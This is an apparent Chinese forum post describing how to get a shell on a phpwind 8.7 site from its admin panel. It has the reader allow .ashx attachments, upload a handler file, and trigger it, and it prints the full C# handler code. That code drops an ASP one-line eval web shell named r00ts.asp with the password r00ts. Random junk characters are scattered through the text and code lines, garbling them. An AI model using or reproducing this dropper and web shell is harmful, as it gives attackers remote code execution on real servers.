phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

2 @6 t) \7 L% J9 f9 P. d群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

0 T* N, m& Z+ _8 H$ s' e然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
! U; n9 E, |# K
; w  Q1 v! ?+ R* ?/ M" o打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
- j- U( R3 d8 \  q: f
$ B6 V% x3 b6 {3 o$ b. k下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
using System;
" T. s. E1 o* f/ K6 o# Uusing System.Web;
% O: l( o4 K5 R, M6 B8 {using System.IO;
public class Handler : IHttpHandler {
: R' H0 D! b# I. [) x1 v9 V! @public void ProcessRequest (HttpContext context) {
% M  k/ E: O5 p, U7 D3 P8 u5 P6 ]context.Response.ContentType = "text/plain";
+ u" G1 E" H, H! W8 c, T  o3 EStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
1 I% e2 e% X2 L  i5 Ufile1.Write("<%eval request(\"r00ts\")%>");
) Z9 s2 P! E$ i- rfile1.Flush();
# x* l7 w" f, |3 C. Z9 \file1.Close();
}
: H8 @9 Y, O! C2 F# d# Dpublic bool IsReusable {
6 t; n6 I) f8 A6 aget {
$ c6 V0 [& R! _7 m% b5 f/ Yreturn false;
}
}
3 u  S6 v9 {; F6 B* t7 B) T}